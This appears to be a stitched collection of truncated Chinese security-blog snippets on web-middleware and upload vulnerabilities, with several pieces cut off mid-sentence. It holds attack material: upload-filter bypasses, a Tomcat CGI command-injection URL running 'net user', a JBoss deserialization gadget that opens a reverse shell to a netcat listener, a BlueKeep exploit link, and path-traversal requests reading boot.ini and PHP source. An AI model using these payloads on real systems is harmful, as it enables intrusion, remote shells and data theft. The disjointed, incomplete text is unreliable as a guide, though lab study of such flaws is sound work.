漏洞

近期在使用绿盟对线上项目进行安全扫描时，发现系统存在host头攻击漏洞。在此记录解决的过程以便后期回顾 不要使用request中的serverName，也就是说host header可能会在攻击时被篡改，依赖request的方法是不可靠的，形如JSP头部中的： String path = request .getContextPath(); String basePath = request .getScheme()+ "://" + request .getServerName()+ ":" + request .getServerPort()+path+ "/" ; 这样的使用方法就会被漏洞检测工具查出来，认定有头攻击漏洞。 修复方案： 【基于tomcat的修复方案】 打开tomcat的conf目录中的server.xml文件，在<Host>节点做如下配置： < Host name = "localhost" appBase = "webapps" unpackWARs = "true" autoDeploy = "true" xmlValidation = "false" xmlNamespaceAware = "false" > < Alias > 10.1.8.158 </ Alias > <!--10.1.8.158 本地局域网--> < Valve className

一、IIS中间组件: 1、PUT漏洞 2、短文件名猜解 3、远程代码执行 4、解析漏洞 二、Apache中间组件: 1、解析漏洞 2、目录遍历 三、Nginx中间组件: 1、文件解析 2、目录遍历 3、CRLF注入 4、目录穿越 四、Tomcat中间组件: 1、远程代码执行 2、war后门文件部署 五、jBoss中间组件: 1、反序列化漏洞 2、war后门文件部署 六、WebLogic中间组件: 1、反序列化漏洞 2、SSRF 3、任意文件上传 4、war后门文件部署 七、其它中间件相关漏洞 1、FastCGI未授权访问、任意命令执行 2、PHPCGI远程代码执行 一、IIS解析漏洞: IIS的安全脆弱性曾长时间被业内诟病，一旦IIS出现远程执行漏洞威胁将会非常严重。远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码，可以导致IIS服务器所在机器蓝屏或读取其内存中的机密数据. PUT漏洞介绍及成因: IIS Server在Web服务扩展中开启WebDAV ，配置了可以写入权限，造成任意文件上传，受影响版本:IIS6.0，漏洞复现:开启WebDAV和写入权限. 图片发自简书App 图片发自简书App 利用BurpSute测试:

文件上传 文件上传一般验证方式： 1.本地js验证(客户端) 2.MIME验证(服务端) 3.拓展名验证(服务端) 4.脚本内容（文件头）验证(服务端) 通常会用到exif_imagetype()函数，这个函数会读取图片头并返回一个数组 绕过方法： 1.本地js验证 方法很多，直接f12删除限制的代码再提交表单 2.mime验证 抓包修改content-type的内容就行了 一般这个验证对应得验证代码如下 $_FILES['upfile']['type'] == 'image/gif' //png、jpg..... 3.拓展名验证 多找一些，尝试找到有没有服务器漏掉得，比如php5，php7 大小写看能否能绕过 0x00绕过 4.文件头验证 修改文件头 JPG ：FF D8 FF E0 00 10 4A 46 49 46 //参考文章https://blog.csdn.net/weixin_44077544/article/details/102688564 PNG： 89 50 4E 47 //参考文章https://blog.csdn.net/weixin_44077544/article/details/102688564 GIF(相当于文本的GIF89a)：47 49 46 38 39 61 //参考文章https://blog.csdn.net/weixin

一、受此漏洞影响的版本 　　windows 7 　　windows 2008 二、端口 　　3389 三、危害 　　1、控制权限 　　2、打蓝屏 四、实验环境 　　1、poc : https://github.com/n1xbyte/CVE-2019-0708 　　2、msf v5 　　3、Windows sever2008 五、过程 　　1、安装更新metasploit 　　apt update; apt install metasploit-framework 来源： https://www.cnblogs.com/jiersixi/p/11768700.html

FireEye 最近检测到一个恶意的Microsoft Office RTF文档，利用 CVE-2017-8759 （一种SOAP WSDL解析器代码注入漏洞）。此漏洞允许在解析SOAP WSDL定义内容期间注入任意代码。 漏洞名称：.NET Framework远程代码执行漏洞 漏洞编号：CVE-2017-8759 漏洞影响：.NET系列产品的远程代码执行（RCE）并进一步控制系统 利用场景：远程钓鱼、社会工程 影响版本：以下.NET版本 影响产品：Office(word excel)Edge IE WinOS Skype Lync Sharepoint PrintClientProxy方法中的WSDL解析器模块中存在代码注入漏洞。如果提供的包含CRLF序列的数据，则IsValidUrl不会执行正确的验证。这就造成了攻击者注入和执行任意代码。 这里不详细介绍了（因为我也不懂），可以参考火眼和360的分析。 新建一个图片文件，名字为office.png（其他格式也行），内容为： <definitions xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:suds="http://www.w3.org/2000/wsdl/suds"

之前看吐司别人发的个文档，简单记的笔记 ----- IIS CVE-2017-7269 Apache CVE-2017-15715 Nginx location /files { } Tomcat CVE-2019-0232 ， 7.0.0 ~ 7.0.93 随意上传 lxhsec.bat http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user Tomcat + 弱口令 && 后台 getshell 漏洞 Tomcat manager App 暴力破解 JBoss 默认端口8080 9990 CVE-2017-12149 利用工具:JavaDeserH2HC,我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap，编译并生成序列化数据: javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip) curl http://192

vulnhub|渗透测试lampiao 题记 最近在打靶机，发现了一个挺有意思的靶机，这里想跟大家分享一下. 环境准备 vulnhub最近出的一台靶机 靶机 (https://www.vulnhub.com/entry/lampiao-1,249/) Lampiao.zip (Size: 669 MB) Download: https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM (https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM) Download (Mirror): https://download.vulnhub.com/lampiao/Lampiao.zip (https://download.vulnhub.com/lampiao/Lampiao.zip) Download (Torrent): https://download.vulnhub.com/lampiao/Lampiao.zip.torrent ( Magnet) (https://download.vulnhub.com/lampiao/Lampiao.zip.torrent) 攻击机 Kali IP 10.10.10.128

webug4.0――上传漏洞篇 第十七关 文件上传(前端拦截) 第十八关 文件上传(解析漏洞) 第十九关 文件上传(畸形文件) 第二十关 文件上传(截断上传) 第二十一关 文件上传(htaccess) 说到底就是上传shell，各种方法绕过 第十七关 文件上传(前端拦截) 进入页面直接上传，发现只能传图片 查看源码： ok，直接使用bp抓包进行更改 先写入木马，保存为一个图片，抓包上传之后在进行更改： 成功！！！ 第十八关 文件上传(解析漏洞) emmm，和上一关一样的页面，上传php不成功，图片才能成功， 而且改了后缀名会弹窗提示error 后面进行各种花里胡哨的绕过 后缀名都尝试一下，发现只有jpg、png、gif为后缀的文件能够上传成功 其他均为error，估摸着就是后缀名白名单过滤，，，， 尝试使用%00截断，结果还是不成功， 后面又想试试文件名长度，结果还是不行，只能查看源码了： 果然是白名单过滤，而且如果你使用%00截断，比如pm.php%00.jpg，他截取的后缀就是php还是过不了，后来尝试了很久，还是绕过去了，使用汉字进行截断？？？ 我第一次见识到还能用汉字绕过，，，，，可能是因为编码的原因吧！！！ 怎么说呢，还是见识少了，敲~~，总之，到这里算是成功绕过了~~ 第十九关 文件上传(畸形文件) 打开页面，一样的页面，直接上传 照样是只能长传图片

【 漏洞 】 检测到目标URL存在http host头攻击漏洞 【 原因 】 在项目中使用了 request.getServerName 导致漏洞的出现 不要使用request中的serverName，也就是说host header可能会在攻击时被篡改，依赖request的方法是不可靠的，形如JSP头部中的： String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; 这样的使用方法就会被漏洞检测工具查出来，认定有头攻击漏洞。 【解决】添加过滤器，使用白名单解决。 附：http状态码 200 OK //客户端请求成功 400 Bad Request //客户端请求有语法错误，不能被服务器所理解 401 Unauthorized //请求未经授权，这个状态代码必须和WWW-Authenticate报头域一起使用 403 Forbidden //服务器收到请求，但是拒绝提供服务 404 Not Found //请求资源不存在，eg：输入了错误的URL 500 Internal Server Error //服务器发生不可预期的错误 503 Server

0x01 漏洞利用 1.打开页面看见url的暗示。。 http : //192.168.72.136/control/more/file_include.php?filename=../../template/dom_xss.html 2.读取boot.ini http : //192.168.72.136/control/more/file_include.php?filename=../../../../boot.ini 想要读取其他敏感文件 而不知道路径的 请看我 这篇文章。 控制好路径即可。 3.查看index.php源文件 192.168 . 72.136 / control / more / file_include . php ? filename = php : //filter/read=convert.base64-encode/resource=../../index.php base64编码直接解密就可以看到源码了。 0x02 结语 单 来源：51CTO 作者： nex1less 链接：https://blog.csdn.net/nex1less/article/details/100009575